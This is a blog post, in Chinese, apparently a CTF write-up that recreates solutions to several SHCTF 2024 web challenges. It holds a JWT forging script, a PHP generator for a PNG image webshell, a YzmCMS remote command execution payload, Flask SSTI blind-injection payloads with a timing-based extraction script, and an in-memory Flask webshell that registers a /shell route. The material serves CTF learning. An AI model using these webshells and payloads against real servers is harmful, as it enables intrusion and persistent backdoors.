<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="odiws">





<title>SHctf-2024部分复现 | Hexo</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 7.0.0"></head>

<body>
    <script>
        // this function is used to check current theme before page loaded.
        (() => {
            const currentTheme = window.localStorage && window.localStorage.getItem('theme') || '';
            const isDark = currentTheme === 'dark';
            const pagebody = document.getElementsByTagName('body')[0]
            if (isDark) {
                pagebody.classList.add('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Dark"
            } else {
                pagebody.classList.remove('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Light"
            }
        })();
    </script>

    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">Bentham&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">Bentham&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
            <div class="main">
                <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    var tocbot_timer;
    var DEPTH_MAX = 6; // 为 6 时展开所有
    var tocbot_default_config = {
        tocSelector: '.tocbot-list',
        contentSelector: '.post-content',
        headingSelector: 'h1, h2, h3, h4, h5',
        orderedList: false,
        scrollSmooth: true,
        onClick: extend_click,
    };

    function extend_click() {
        clearTimeout(tocbot_timer);
        tocbot_timer = setTimeout(function() {
            tocbot.refresh(obj_merge(tocbot_default_config, {
                hasInnerContainers: true
            }));
        }, 420); // 这个值是由 tocbot 源码里定义的 scrollSmoothDuration 得来的
    }

    document.ready(function() {
        tocbot.init(obj_merge(tocbot_default_config, {
            collapseDepth: 1
        }));
    });

    function expand_toc() {
        var b = document.querySelector('.tocbot-toc-expand');
        var expanded = b.getAttribute('data-expanded');
        expanded ? b.removeAttribute('data-expanded') : b.setAttribute('data-expanded', true);
        tocbot.refresh(obj_merge(tocbot_default_config, {
            collapseDepth: expanded ? 1 : DEPTH_MAX
        }));
        b.innerText = expanded ? 'Expand all' : 'Collapse all';
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

    function obj_merge(target, source) {
        for (var item in source) {
            if (source.hasOwnProperty(item)) {
                target[item] = source[item];
            }
        }
        return target;
    }
</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">SHctf-2024部分复现</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">odiws</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">October 27, 2024&nbsp;&nbsp;18:58:26</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%8E%B0/">比赛复现</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <h2 id="SHctf2024部分复现："><a href="#SHctf2024部分复现：" class="headerlink" title="SHctf2024部分复现："></a>SHctf2024部分复现：</h2><h3 id="week2：登陆验证"><a href="#week2：登陆验证" class="headerlink" title="week2：登陆验证"></a>week2：登陆验证</h3><p>描述：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">他们都说jwt不安全，那我拿个密钥加密不就行了，你又不知道密钥是多少。什么? 你说可以爆破出来? 666666!</span><br></pre></td></tr></table></figure>

<p>登陆页面登录后：</p>
<p>发现可疑token：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3Mjg4Mzg3MzIsImlhdCI6MTcyODgzMTUzMiwibmJmIjoxNzI4ODMxNTMyLCJyb2xlIjoidXNlciJ9.VGA6D757VurbD0RD4CS16PZOQ6jYfVowaAVT87h3NCY</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://jwt.io/%EF%BC%9A">https://jwt.io/：</a></p>
<p><img src="https://zty--666.oss-cn-shanghai.aliyuncs.com/202410271905750.png" alt="image-20241027190456071"></p>
<p>能看到role处是user,根据题目描述基本可以知道改为admin即可成为”真正的admin”</p>
<p>但这个token的加密是有密钥的,根据题目描述”666666”得知要爆破6位,优先考虑弱口令</p>
<p>用这个来jwt爆破</p>
<p><a target="_blank" rel="noopener" href="https://github.com/lmammino/jwt-cracker">https://github.com/lmammino/jwt-cracker</a></p>
<p><img src="https://zty--666.oss-cn-shanghai.aliyuncs.com/202410272015083.png" alt="image-20241027201523549"></p>
<p>基本就是这样的：获取密码，改东西上传就有flag了。</p>
<p>脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> jwt</span><br><span class="line"><span class="comment"># payload</span></span><br><span class="line">token_dict = &#123;</span><br><span class="line">  <span class="string">&quot;exp&quot;</span>: <span class="number">1729778616</span>,</span><br><span class="line">  <span class="string">&quot;iat&quot;</span>: <span class="number">1729771416</span>,</span><br><span class="line">  <span class="string">&quot;nbf&quot;</span>: <span class="number">1729771416</span>,</span><br><span class="line">  <span class="string">&quot;role&quot;</span>: <span class="string">&quot;admin&quot;</span></span><br><span class="line">&#125;</span><br><span class="line">headers = &#123;</span><br><span class="line">  <span class="string">&quot;alg&quot;</span>: <span class="string">&quot;HS256&quot;</span>,</span><br><span class="line">  <span class="string">&quot;typ&quot;</span>: <span class="string">&quot;JWT&quot;</span></span><br><span class="line">&#125;</span><br><span class="line">jwt_token = jwt.encode(token_dict,  <span class="comment"># payload, 有效载体</span></span><br><span class="line">                       <span class="string">&quot;222333&quot;</span>,  <span class="comment"># 进行加密签名的密钥</span></span><br><span class="line">                       algorithm=<span class="string">&quot;none&quot;</span>,  <span class="comment"># 指明签名算法方式, 默认也是HS256</span></span><br><span class="line">                       headers=headers</span><br><span class="line">                       <span class="comment"># json web token 数据结构包含两部分, payload(有效载体), headers(标头)</span></span><br><span class="line">                       )</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(jwt_token)</span><br></pre></td></tr></table></figure>

<h3 id="week2：拜师之旅·番外"><a href="#week2：拜师之旅·番外" class="headerlink" title="week2：拜师之旅·番外"></a>week2：拜师之旅·番外</h3><p>考查PNG文件上传二次渲染</p>
<p>当上传一张图片成功后，查看图片可以发现是通过GET传文件路径来显示的，考虑存在include包含</p>
<p>并且根据题目描述尝试下载图片回来对比会发现上传与下载的图片数据不一致,存在二次渲染</p>
<p>此时需要构造一张不被渲染掉的png图片马，这里借用了网上的脚本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,</span><br><span class="line">           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,</span><br><span class="line">           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,</span><br><span class="line">           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,</span><br><span class="line">           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,</span><br><span class="line">           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,</span><br><span class="line">           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,</span><br><span class="line">           0x66, 0x44, 0x50, 0x33);</span><br><span class="line">           </span><br><span class="line">$img = imagecreatetruecolor(32, 32);</span><br><span class="line"> </span><br><span class="line">for ($y = 0; $y &lt; sizeof($p); $y += 3) &#123;</span><br><span class="line">   $r = $p[$y];</span><br><span class="line">   $g = $p[$y+1];</span><br><span class="line">   $b = $p[$y+2];</span><br><span class="line">   $color = imagecolorallocate($img, $r, $g, $b);</span><br><span class="line">   imagesetpixel($img, round($y / 3), 0, $color);</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">imagepng($img,&#x27;1.png&#x27;);  //要修改的图片的路径</span><br><span class="line"> </span><br><span class="line">/* 木马内容</span><br><span class="line">&lt;?$_GET[0]($_POST[1]);?&gt;</span><br><span class="line"> */ </span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>将构造好的图片马上传,并在查看图片页面进行命令执行</p>
<p>GET ：靶机地址&#x2F;？image&#x3D;&#x2F;upload&#x2F;293146324.png<code>&amp;0=system</code></p>
<p>发布：<code>1=tac /f*</code></p>
<p>执行一次后再重新下载图片回来即可得到回显</p>
<p><img src="https://zty--666.oss-cn-shanghai.aliyuncs.com/202410272029901.png" alt="image-20241027202934731"></p>
<p>直接出了</p>
<h3 id="Week3-小小cms"><a href="#Week3-小小cms" class="headerlink" title="[Week3] 小小cms:"></a>[Week3] 小小cms:</h3><p>YzmCMS 的pay接口调用了 db_pdo类的wheremethods 导致了远程命令执行漏洞，未经身份验证的远程攻击者可利用此漏洞执行任意系统指令，写入后门文件，最终可获取服务器权限。YzmCMS 的pay接口调用了 db_pdo类的wheremethods 导致了远程命令执行漏洞，未经身份验证的远程攻击者可利用此漏洞执行任意系统指令，写入后门文件，最终可获取服务器权限。</p>
<p><img src="https://zty--666.oss-cn-shanghai.aliyuncs.com/202410272033232.png" alt="image-20241027203357867"></p>
<p>POST:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">out_trade_no[0]=eq&amp;out_trade_no[1]=cat /flag&amp;out_trade_no[2]=system</span><br></pre></td></tr></table></figure>

<h3 id="week3-love-flask"><a href="#week3-love-flask" class="headerlink" title="week3:love_flask"></a>week3:<strong>love_flask</strong></h3><p>源码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">pretty_input</span>():</span><br><span class="line">    <span class="keyword">return</span> render_template_string(html_template)</span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/namelist&#x27;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">name_list</span>():</span><br><span class="line">    name = request.args.get(<span class="string">&#x27;name&#x27;</span>)</span><br><span class="line"></span><br><span class="line">    template = <span class="string">&#x27;&lt;h1&gt;Hi, %s.&lt;/h1&gt;&#x27;</span> % name</span><br><span class="line">    rendered_string =  render_template_string(template)</span><br><span class="line">    <span class="keyword">if</span> rendered_string:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;Success Write your name to database&#x27;</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;Error&#x27;</span></span><br><span class="line"><span class="keyword">if</span> </span><br><span class="line">name</span><br><span class="line"> == <span class="string">&#x27;</span></span><br><span class="line"><span class="string">__main__</span></span><br><span class="line"><span class="string">&#x27;</span>:</span><br><span class="line">    app.run(port=<span class="number">8080</span>)</span><br></pre></td></tr></table></figure>

<p>关键词：template     ——–&gt;   sstI</p>
<p>没有return ， 但是没有任何的过滤</p>
<p>但是不出网，不回显，做不了一点</p>
<p>不回显可以反弹shell，不出网不回显就不知道了，</p>
<p>wp有两种方法：</p>
<p>一种是盲注，因为渲染失败会返回500，所以可以先爆出eval</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/namelist?name=&#123;&#123;().__class__.__base__.__subclasses__()[&#123;&#123;int(100-200)&#125;&#125;].__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;eval&#x27;](&#x27;__import__(&quot;time&quot;).sleep(3)&#x27;)&#125;&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://mmbiz.qpic.cn/mmbiz_png/crOK73kjDuiaCYofiaN8P1yvfgjTKEPdNbVKOcpjncUfkP1gtcd2VVX4YzcIfZgQHibDsYByCicmu87UF6cQAYGNvA/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片"></p>
<p>接着通过构造延时来爆flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">flag =&#x27;SHCTF&#123;&#x27;</span><br><span class="line">table = &#x27;-ABCDEFabcdef0123456789&#x27;</span><br><span class="line">url = &#x27;http://210.44.150.15:25528/namelist?name=&#x27;</span><br><span class="line">for len in range(7,43):</span><br><span class="line">    for i in table:</span><br><span class="line">      ii = flag +i</span><br><span class="line">      start_time = time.time()</span><br><span class="line">      data = &quot;&#123;&#123;&quot;+&quot;().__class__.__base__.__subclasses__()[100].__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;eval&#x27;](&#x27;__import__(\&quot;os\&quot;).popen(\&quot;if [ $(head -c &#123;&#125; /flag) = &#123;&#125; ]; then sleep 2; fi\&quot;).read()&#x27;)&quot;.format(len,ii) +&quot;&#125;&#125;&quot;</span><br><span class="line">      #print(data)</span><br><span class="line">      url1 = url + data</span><br><span class="line">      r = requests.get(url1)</span><br><span class="line">      end_time = time.time()</span><br><span class="line">      response_time = end_time - start_time</span><br><span class="line">      if response_time &gt;= 2:</span><br><span class="line">          flag = flag +i</span><br><span class="line">          print(flag)</span><br><span class="line">      else:</span><br><span class="line">          continue</span><br><span class="line">print(flag+&#x27;&#125;&#x27;)</span><br></pre></td></tr></table></figure>

<p>第二种</p>
<p>内存马</p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/10933?time__1311=CqjxRQiQqQqqlxGg6QGCDcmQD80rdDCbAeD">https://xz.aliyun.com/t/10933?time__1311=CqjxRQiQqQqqlxGg6QGCDcmQD80rdDCbAeD</a></p>
<p>内存马无需上传文件也不生成文件。内存马通过动态注册一个路由来作为执行命令参数的入口。<code>&#123;&#123;url_for.__globals__['__builtins__']['eval']("app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())",&#123;'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']&#125;)&#125;&#125;</code></p>
<p><img src="https://mmbiz.qpic.cn/mmbiz_png/crOK73kjDuiaCYofiaN8P1yvfgjTKEPdNbUUmZdib44GLJRFQC74xxXcC4vgnsMWwpEibich74wfnVr2uwGaXrTqRibQ/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" alt="图片"></p>
<p>内存马看了一下，出了最后两句，其他的还是很好理解的，就是新增了一个</p>
<p>路由，进行了命令执行，很神奇</p>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>odiws</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="http://odiws.github.io/2024/10/27/SHctf%E5%A4%8D%E7%8E%B0/">http://odiws.github.io/2024/10/27/SHctf%E5%A4%8D%E7%8E%B0/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2019 <a target="_blank" rel="noopener" href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Slogan:</span>
                         <span>Do you believe in <strong>DESTINY</strong>?</span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/"># 文件上传</a>
                    
                        <a href="/tags/MD5%E7%A2%B0%E6%92%9E/"># MD5碰撞</a>
                    
                        <a href="/tags/jwt%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4/"># jwt密码爆破</a>
                    
                        <a href="/tags/cms/"># cms</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
            
            <a class="next" rel="next" href="/2024/10/23/NewStarCTF2023%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-include0%E3%80%820/">[NewStarCTF2023公开赛道]include0。0</a>
            
        </section>


    </article>
</div>

            </div>
            <footer id="footer" class="footer">
    <div class="copyright">
        <span>© odiws | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>

</html>